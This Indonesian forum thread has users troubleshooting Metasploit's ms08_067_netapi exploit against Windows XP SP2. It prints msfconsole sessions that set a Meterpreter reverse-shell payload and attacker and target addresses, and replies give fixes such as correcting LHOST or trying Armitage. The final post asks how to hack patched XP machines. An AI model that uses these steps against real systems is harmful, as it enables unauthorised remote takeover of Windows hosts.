metasploit xp sp2+
#11
signature tiap OS kalau discan itu berbeda2, mungkin itu signature mirip xp2 makanya ditulis +
cmiiw

#12
(02-14-2012, 10:23 AM)dvil Wrote: mas mau tanyaa ada yang bisa g cara hack windows xp sp2+
soalnya saya exploit kok muncul kayak gini
Code:
[*] Started reverse handler on 192.168.1.100:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 2+ - lang:English
[-] Could not determine the exact service pack
[*] Auto-targeting failed, use 'show targets' to manually select one
[*] Exploit completed, but no session was created.
msf exploit(ms08_067_netapi) > set rhost 192.168.1.101

kenapa kok ada sp+ nyaa
ada yang bisa bantu????

Ini targetnya cuman bikin untuk uji coba ataukah emang bener2 hack in the wild???
Terus target systemnya dah di patching apa blom???

#13
Code:
msf > use exploit/windows/smb/ms08_067_netapi
msf  exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp_allports
payload => windows/meterpreter/reverse_tcp_allports
msf  exploit(ms08_067_netapi) > set lhost 127.0.0.1
lhost => 127.0.0.1
msf  exploit(ms08_067_netapi) > set rhost 192.168.56.1
rhost => 192.168.56.1
msf  exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 127.0.0.1:1
[-] Exploit exception: The connection was refused by the remote host (192.168.56.1:445).
msf  exploit(ms08_067_netapi) >

kaka, punya ane ko kaya di atas..padahal firewall off, ping 2 arah reply semua..
apa karna kelas IP nya beda, ??
mhon pencerahannya ka...

#14
om ane mau nanya ini...
exploit nya malah gak da tulisan berhasil atau tidaknya om..
dari
[*] Attemping to trigger vulnebirity...
langsong ke tab..
msf exploit(ms08_067_netapi) > set rhost 192.168.1.101
gak da tulisan
Exploit complete om..
nah ntuh kenapa yah om...
mohon pencerahan nya om..
maklum ane pengguna baru om...
^_^

#15
(04-02-2012, 08:30 AM)DENY Wrote:
Code:
msf > use exploit/windows/smb/ms08_067_netapi
msf  exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp_allports
payload => windows/meterpreter/reverse_tcp_allports
msf  exploit(ms08_067_netapi) > set lhost 127.0.0.1
lhost => 127.0.0.1
msf  exploit(ms08_067_netapi) > set rhost 192.168.56.1
rhost => 192.168.56.1
msf  exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 127.0.0.1:1
[-] Exploit exception: The connection was refused by the remote host (192.168.56.1:445).
msf  exploit(ms08_067_netapi) >

kaka, punya ane ko kaya di atas..padahal firewall off, ping 2 arah reply semua..
apa karna kelas IP nya beda, ??
mhon pencerahannya ka...

coba set LHOST nya sesuai IP yang ada digunakan untuk koneksi ke jaringan, bukan IP localhost


(04-05-2012, 12:26 AM)blue_demon7388 Wrote: om ane mau nanya ini...
exploit nya malah gak da tulisan berhasil atau tidaknya om..
dari
[*] Attemping to trigger vulnebirity...
langsong ke tab..
msf exploit(ms08_067_netapi) > set rhost 192.168.1.101
gak da tulisan
Exploit complete om..
nah ntuh kenapa yah om...
mohon pencerahan nya om..
maklum ane pengguna baru om...
^_^

keluar msf trus coba lagi, bisa ga? klo ga bisa, coba exploit yg lain bisa ga?

#16
tetep juga om...
begitu juga hasilnya..
dah ganti exploit pun om sama..
gmn yah ntuh om???

#17
(04-05-2012, 03:19 AM)blue_demon7388 Wrote: tetep juga om...
begitu juga hasilnya..
dah ganti exploit pun om sama..
gmn yah ntuh om???

coba ganti file2 exploitnya dengan yg disini:
http://dev.metasploit.com/redmine/projec...repository

dicari aja yg mau dipakai apa, klo ga bisa ya terpaksa instal ulang metasploitnya

atau coba armitage dulu bisa ga?

#18
maaf ka, kemaren ane salah set lhost nya...AngryAngry
maklum pemula..heheh

#19
okeh om...
ternyata pakek armitage juga om yang bener..
makasih yah om konspirasi...
i love u full..
hohohohohoho

#20
Gimana kayaknya sudah di patch
terus ada solusi kah buat hack xp yang sudah di patch







Users browsing this thread: 1 Guest(s)